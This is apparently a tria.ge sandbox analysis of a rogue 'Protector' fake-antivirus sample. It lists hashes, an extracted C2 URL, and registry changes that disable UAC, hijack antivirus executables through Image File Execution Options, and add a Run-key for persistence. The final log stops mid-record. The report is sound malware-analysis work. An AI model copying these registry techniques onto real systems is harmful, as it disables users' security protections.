Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25/09/2024, 05:06
Static task
static1
Behavioral task
behavioral1
Sample
f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe
-
Size
1.8MB
-
MD5
f5403e8870e5c8be62d3e8d5b75d1124
-
SHA1
a7558db6c81fc772773413ae6dc6680fdc996b15
-
SHA256
d86b1e40b8cc1ef9927a6d769f19d0f55b5e3fe40742e15ecc942046f0305573
-
SHA512
56682ae5241f6d995e18860472a88b6f921e4adf6947b745cc6968a6df551eacc1f4c4105afa2544b48b8ff8a4d76adb6f4fb1996fe179ac95739356655f1dc4
-
SSDEEP
49152:UupudP6G4ldxoicRQBBp4kYWdipwhNi+3g7YnMtE:4t6DdxPt26diy++3g7YMu
Malware Config
Extracted
http://galaint.updatesecstorage.info/?0=112&1=3&2=1&3=52&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=vpwgfagqiu&14=1
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-hdkt.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-hdkt.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-hdkt.exe -
Disables taskbar notifications via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\periscope.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ppvstop.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sh.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\undoboot.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blackice.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gmt.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luall.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsisetup.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ifw2000.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mwatch.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\neomonitor.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notstart.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\agentw.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autotrace.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\History.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sms.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vet95.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zatutor.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashQuick.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fch32.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows Police Pro.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rcsync.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msdos.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\outpostproinstall.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsstat.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgupd.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avkservice.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[2].exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loader.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\efpeadm.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nwtool16.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vptray.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscfxav.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fih32.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\init32.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\licmgr.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\stcloader.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcagent.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\agent.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avsched32.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccevtmgr.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vscan40.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\protector.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PskSvc.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qconsole.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\claw95.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmon016.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mgavrte.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msdm.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mgavrtcl.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rtvscan.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xpf202en.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgserv9.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blink.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssurf.exe Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winstart.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drweb32.exe\Debugger = "svchost.exe" Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wkufind.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SaveKeep.exe Protector-hdkt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vscan40.exe\Debugger = "svchost.exe" Protector-hdkt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hxdl.exe Protector-hdkt.exe -
Deletes itself 1 IoCs
pid Process 2776 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2888 Protector-hdkt.exe -
Loads dropped DLL 4 IoCs
pid Process 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-hdkt.exe" Protector-hdkt.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-hdkt.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\eventvwr.msc Protector-hdkt.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc Protector-hdkt.exe File opened for modification C:\Windows\SysWOW64\services.msc Protector-hdkt.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2044 sc.exe 1048 sc.exe 1832 sc.exe 2728 sc.exe 2020 sc.exe 2944 sc.exe 2732 sc.exe 2360 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Protector-hdkt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 Protector-hdkt.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" Protector-hdkt.exe -
Modifies registry class 28 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361}\Implemented Categories\ f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\ f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\HELPDIR\ f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361}\TypeLib f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361}\VERSION f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\0\win32 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\HELPDIR f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361}\TypeLib\ = "{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}" f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361}\Programmable\ f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\HELPDIR\ = "%systemroot%\\SysWow64\\" f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361}\ = "Joxigep Laxese Cixoce object" f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361}\Programmable f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\0 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\0\win32\ = "%systemroot%\\SysWow64\\PortableDeviceApi.dll" f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361}\VERSION\ = "1.0" f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\ f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\0\ f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\FLAGS\ f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361}\TypeLib\ f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\0\win32\ f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361}\VERSION\ f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3} f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\FLAGS\ = "0" f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361} f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B5E8437-F7F2-4A91-C6A9-2C89D8863361}\Implemented Categories f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\ = "PortableDeviceApi 1.0 Type Library" f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E9DBDEE2-6566-AAF8-3492-34FB1D2705D3}\1.0\FLAGS f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Protector-hdkt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Protector-hdkt.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Token: SeShutdownPrivilege 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe Token: SeDebugPrivilege 2888 Protector-hdkt.exe Token: SeShutdownPrivilege 2888 Protector-hdkt.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe 2888 Protector-hdkt.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 3056 wrote to memory of 2888 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe 30 PID 3056 wrote to memory of 2888 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe 30 PID 3056 wrote to memory of 2888 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe 30 PID 3056 wrote to memory of 2888 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe 30 PID 3056 wrote to memory of 2776 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe 31 PID 3056 wrote to memory of 2776 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe 31 PID 3056 wrote to memory of 2776 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe 31 PID 3056 wrote to memory of 2776 3056 f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe 31 PID 2888 wrote to memory of 2924 2888 Protector-hdkt.exe 33 PID 2888 wrote to memory of 2924 2888 Protector-hdkt.exe 33 PID 2888 wrote to memory of 2924 2888 Protector-hdkt.exe 33 PID 2888 wrote to memory of 2924 2888 Protector-hdkt.exe 33 PID 2888 wrote to memory of 2944 2888 Protector-hdkt.exe 36 PID 2888 